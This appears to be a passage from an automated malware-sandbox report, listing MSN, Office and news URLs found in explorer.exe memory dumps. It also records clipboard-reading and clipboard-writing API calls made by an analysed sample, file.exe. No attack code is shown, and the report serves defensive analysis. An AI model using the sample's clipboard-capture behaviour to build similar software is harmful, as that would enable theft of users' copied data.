          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0tG
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0tG-dark
          Source: explorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 0000000E.00000002.2916503108.0000000002CC0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: explorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2759034207.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2755724636.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AALm7gX.img
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16JkoV.img
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 0000000E.00000003.2759034207.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2755724636.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1669923079.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C557000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2759034207.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2755724636.0000000008C8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/us-rep-henry-cuellar-of-texas-is-carjacked-by-three-armed-attac
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/melted-wax-statue-of-lincoln-sparks-discussion-in-northwest-dc-nei
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/texas-congressman-is-victim-of-carjacking-in-washington-d-c/ar-AA1
          Source: explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F16B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00F16B0C
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F16D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_00F16D07
